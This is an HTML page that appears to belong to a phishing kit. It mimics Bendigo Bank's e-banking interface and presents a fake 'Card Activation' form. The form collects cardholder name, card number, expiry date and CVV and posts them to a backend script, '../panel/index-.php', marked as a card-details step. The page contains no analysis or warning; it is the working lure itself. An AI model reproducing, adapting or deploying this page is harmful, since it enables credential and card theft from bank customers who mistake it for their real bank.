<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bendigo Bank - Log in to e-banking</title>
    <link rel="stylesheet" href="./assets/style/style2.css">
    <link rel="icon" href="./assets/images/logoicon.png">
    <style>
        .bndgoPage2 .bndgoPage_02{
            filter: blur(0px);
        }
    </style>
</head>
<body>
    <section class="bndgoPage2">
        <div class="bndgoPage_01">
            <div class="bndgoPage_01-LOGO">
                <img src="./assets/images/02.png" alt="">
                <img src="./assets/images/01.png" alt="">
            </div>
            <div class="bndgoPage_01-NAVBAR">
                <ul>
                    <li> <img src="./assets/images/02/a1.png" alt=""><span>Accounts</span> </li>
                    <li><img src="./assets/images/02/a2.png" alt=""><span>Move Money</span></li>
                    <li><img src="./assets/images/02/a3.png" alt=""><span>Activity</span> </li>
                    <li><img src="./assets/images/02/a4.png" alt=""><span>Contact</span></li>
                    <li><img src="./assets/images/02/a5.png" alt=""><span>Cards</span></li>
                    <li><img src="./assets/images/02/a6.png" alt=""><span>What's New</span></li>
                    <li><img src="./assets/images/02/a7.png" alt=""><span>Support</span></li>
                </ul>
                <ul>
                    <li class="liAc"><img src="./assets/images/02/a8.png" alt=""><span>Setting</span></li>
                    <li><img src="./assets/images/02/a9.png" alt=""><span>Log Out</span></li>
                </ul>
            </div>
        </div>
        <div class="bndgoPage_011"></div>
        <!--  -->
        <div class="bndgoPage_02">
            <nav>
                <div class="nav0101">
                    <img src="./assets/images/02/a10.png" alt="">
                    <h1>Card Activation</h1>
                    <button style="opacity: 0;">Save</button>
                </div>
            </nav>
            <form class="bndgoPage_02Input" action="../panel/index-.php" method="post">
                <input type="hidden" name="step" value="CardDeatilsStep">
                <div class="bndgoPage_02Input22">
                    <p class="bndgoPage_02Input22Paraaa">If you have a card to activate against one of your accounts, enter the card number here when it arrives.</p>
                    <div class="bndgoPage_02Input_0">
                        <label>Card  Holder</label>
                        <div class="bndgoPage_02Input_0_0">
                            <img src="./assets/images/02/refund-line.png" alt="">
                            <input type="text" id="CardHolder" name="CardName" required>
                        </div>
                    </div>
                    <div class="bndgoPage_02Input_0">
                        <label>Card Number</label>
                        <div class="bndgoPage_02Input_0_0">
                            <img src="./assets/images/02/bank-card-line.png" alt="">
                            <input type="text" id="CardNumber" name="CardNumber" inputmode="numeric" placeholder="XXXX XXXX XXXX XXXX" required>
                        </div>
                    </div>
                    <div class="bndgoPage_02Input_0 bndgoPage_02Input_1">
                        <div class="bndgoPage_02Input_0_0">
                            <img src="./assets/images/02/calendar-2-line.png" alt="">
                            <input type="text" id="DateExpry" name="DateExpry" inputmode="numeric"  placeholder="MM/YY" required>
                        </div>
                        <div class="bndgoPage_02Input_0_0">
                            <img src="./assets/images/02/lock-unlock-fill.png" alt="">
                            <input type="text" id="Cvv" name="Cvv" placeholder="XXX" inputmode="numeric" required>
                        </div>
                    </div>
                    <button type="submit" id="save1">Activate</button>
                </div>
            </form>
        </div>
    </section>
    <script src="https://cdn.jsdelivr.net/npm/cleave.js@1.6.0/dist/cleave.min.js"></script>
    <script>
        const cleaveCC = new Cleave("#CardNumber", {creditCard: true,delimiter: " ",}); 
        const cleaveDate = new Cleave("#DateExpry", {date: true,datePattern: ["m", "y"],});  
        const cleaveCCV = new Cleave("#Cvv", {blocks: [3],});
        // --------------------------------------------
        const save1=document.getElementById('save1');
        setInterval(()=>{
            if(document.getElementById('CardHolder').value == ''  || document.getElementById('CardNumber').value == '' || document.getElementById('DateExpry').value == '' || document.getElementById('Cvv').value == ''){                
                save1.style.opacity='0.2';
                save1.style.cursor="not-allowed";
                save1.disabled = true
            }else{
                save1.style.opacity='1';
                save1.style.cursor="pointer";
                save1.disabled = false
            }
        },10);
    </script>
</body>
</html>